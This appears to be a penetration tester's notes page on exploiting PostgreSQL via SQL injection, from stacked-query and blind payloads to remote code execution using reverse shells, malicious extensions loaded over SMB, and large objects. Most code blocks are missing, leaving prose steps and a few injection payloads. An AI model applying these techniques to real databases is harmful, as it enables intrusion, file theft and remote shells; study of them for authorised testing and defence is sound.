PostgreSQL Exploitation [NEW]

Stacked queries and Blind Time Based SQL Injection

Watch out for queries that returns multiple rows in the place where application returns just one - it can break the program.

It is important to know PostgreSQL supports stacked queries (only the basic ones: SELECT, DELETE, INSERT etc). That means if we will find injection point we are able to terminate the current query with ; keyword and then inject our own command.

Example (sleep script injection to confirm the vulnerability):

http://site?id=5;SELECT+pg_sleep(10);

After confirming the vulnerability and ability to perform stacked queries we can proceed to crafting RCE payload. This is possible by usage of.

Reading files with PostgreSQL

select pg_read_file('[path_to_file]' , 0 , 1000000);

Blind Boolean-Based SQL Injection (UNION INTEGER CAST)

We are able to extract the data from database even if UNION cats to Integer. With the payload below, and swapping the P with another letters. We can determine with which letter the value starts.

If we want to automate the process we have to go through whole alphabet in order to see the match. When first letter is discovered script has to extend the search by another letter and compare two letters from database with one valid previous letter and the new one which is again guessed by loop.

Example Boolean Based SQL injection payload:

SELECT version()UNION SELECT CASE WHEN SUBSTRING(version(), 1, 1) = 'P' THEN '1' ELSE '0' END;

Problem with special characters

Sometimes you can encounter encoding that is done on special HTML chars. In order to still being able to use them we can leverage CHR characters in order to create the command.

[RCE] Saving files using PostgreSQL

We can leverage the COPY TO functionality in order to create reverse shell on the machine but in this case CHR() will not work.

Bypassing the possible restrictions

That why we have to use substitutes - there are a few options in PostgreSQL that allows us to replace special characters.

For example when we cannot use ' character we can replace it with $$. If we cannot use " we can replace it with $.

Creating Reverse Shell

If payload is too long and you get 400 Bad Request or 500 Internal Server Error use POST request in order to deliver the malicious data.

In order to create reverse shell / just create the file using PostgreSQL we have to:

  1. Create temporary table and enter the data there.

  2. Use data from temporary data to fill up our created file.

You can also use base64 decoder in order to deliver the payload without catching errors:

Meterpreter payload files

For malicious files with reverse shell you can use meterpreter. Sample command that creates malicious file:

Superuser functionalities

In order to check if we are superusers we can run the following command:

in the case of blind SQLi we can merge it with pg_sleep command

If this is the case new possibilities are open to us. For example we can upload malicious PostgreSQL extensions in order to gain RCE.

[RCE] Malicious extension (.dll)

In order for extension to work it has to follow appropriate PostgreSQL structure.

With more general approach to PostgreSQL exploitation we usually choose not environment specific universal solution. With that can help us malicious extension creation. We are able to develop our own C written addon.

Loading extension:

Extension C code (compile on the victim host):

Testing the execution from local location

Before running extension created by us we have to create UDF (User Defined Function).

Sample UDF:

This piece of SQL query loads our extension and execute previously defined command to open calc.exe on the target machine.

Executing the script from remote location

In order to load the extension from remote loctation attacker has to host his own smbserver using impacket library:

Now we can point to remote location instead of the local one in our payload:

[RCE] PostgreSQL Large Objects

WHEN EXPLOITING MAKE SURE YOU ENCODE REQUIRED CHARACTERS AND DO NOT USE MULTILINE STATEMENTS, COMMENT OUT THE UNUSED CODE!

CHECK ALSO PERMISSIONS -> SQL AGENT CAN SOMETIMES HAVE LIMITED SAVING CAPABILITIES. IN THIS CASE YOU HAVE TO USE PUBLICLY WRITEABLE PATHS.

COPY TO function is not able to transfer binary files -> this is the remediation for that obstacle

While malicious extensions are a great way to gain RCE in the internal network they are not good for testing from external address.

One of the best ways to deliver and execute payload is combining PostgreSQL LO and malicious extension.

In order to do that we have to:

  1. Generate a DLL file containing the malicious payload.

Build the file below on the victim's system if possible and transfer the file to attackers machine to be sure everything will work properly.

You can use the following powershell command in order to convert built .dll file to hex encoding.

  1. Execute a query to create a large object from an arbitrary remote file on disk.

You can select any other existing file on the system instead of win.ini.

1337 -> ID of large object in the table (required to retreive it later)

  1. Execute a query to write the first 2KB of the DLL to page 0 of the large object.

7730374 -> place where we put 2KB of our payload [HEX Encoded]

loid = 1337 -> ID of our Large Object created before

pageno = 0 -> first part of the file

  1. Execute queries to add additional pages in the pg_largeobject table to store the remaining contents of the DLL.

For the encoding you can use the following command: xxd -p file.dll > output.txt

(optional)

pageno = 1 -> second part of the file

Script below automates process of inserting the file:

  1. Execute a query to export the large object (DLL) to the remote server’s file system.

  1. Execute a query to create a PostgreSQL User Defined Function (UDF) that uses the exported DLL and execute a payload inside.

Instead of calc.exe we put here reverse shell payload (e.g. downloading and executing nc.exe)

Reverse shell using Large Object Addon [Python Script]

PreviousCode reviewNextHSQLDB Exploitation

Last updated